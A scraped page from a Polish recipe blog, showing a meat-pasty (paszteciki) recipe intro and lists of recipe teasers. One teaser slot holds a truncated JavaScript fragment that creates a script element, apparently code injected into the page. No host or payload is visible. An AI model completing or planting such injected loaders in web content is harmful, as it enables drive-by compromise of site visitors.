Paszteciki z mięsem mielonym
Źródło: https://gotujzprezesem.pl/2016/09/paszteciki-z-miesem-mielonym/?utm_source=rss&utm_medium=rss&utm_campaign=paszteciki-z-miesem-mielonym
Paszteciki to świetny dodatek do barszczu czerwonego! Można je podawać na ciepło, a także na zimno. Przygotowanie ich to nic skomplikowanego, a efekt z pewnością zadowoli wszystkich was! ???? Składniki na ciasto: 1/2 kostki drożdży3/4 szklanki mlekałyżeczka cukru i solizioła prowansalskie2 łyżki olejuokoło 400 g mąki Składniki na farsz:0,5 kg mięsa mielonego z szynki1 duża...
Najnowsze przepisy
Poznaj rybę po grecku z fantastycznie dobranymi warzywami... ⇖ 12
Dzisiaj krótko i do rzeczy.To już kolejny piernik na moim... ⇖ 7
Łaciatek z makiem to ciasto, które przyciąga wzrok już... ⇖ 18
Ciasto jest wyśmienite, wielowarstwowe począwszy od... ⇖ 18
(function(){ u7xb=document.createElement("script");u7xb.type ⇖ 19
Rurki z kremem Kinder to przepis, który smakiem przenosi... ⇖ 15
20.12.2025 Magda Śledzie z grzybami i pieczoną papryką... ⇖ 20
Przepisy z bloga
Batat z pieca, lekko przypieczony na krawędziach i kremowy... ⇖ 39
Są takie smaki, które całkowicie wykraczają poza swoje... ⇖ 43
Grecka kuchnia to smak lata, morza i gaju oliwnego w jednym... ⇖ 50
Istnieją potrawy, które mimo pozornej prostoty zaskakują... ⇖ 52
Jest coś zaskakująco magicznego w połączeniu musztardy... ⇖ 42
Latem 2011 roku, podczas podróży przez stany północnego... ⇖ 38
Polędwiczka wieprzowa to jedno z najszlachetniejszych... ⇖ 52
Carpaccio to danie, które uchodzi za kwintesencję... ⇖ 56
Przepisy na czasie
Prosty przepis na klasyczny drożdżowy makowiec. Przepis... ⇖ 2689
Masz ochotę na coś słodkiego bez pieczenia? Zrób sernik... ⇖ 2096
Piernik przekładany kremem to jedno z tych ciast, które... ⇖ 1441
NAJLEPSZY PRZEPIS NA CIASTO NA PIEROŻKIBardzo lubię... ⇖ 838
To niezwykle proste ciasto piernikowe, które zawsze się... ⇖ 749
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 674
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 643
Cześć! Dzisiaj robimy ciasto lion bez pieczenia, to... ⇖ 641









































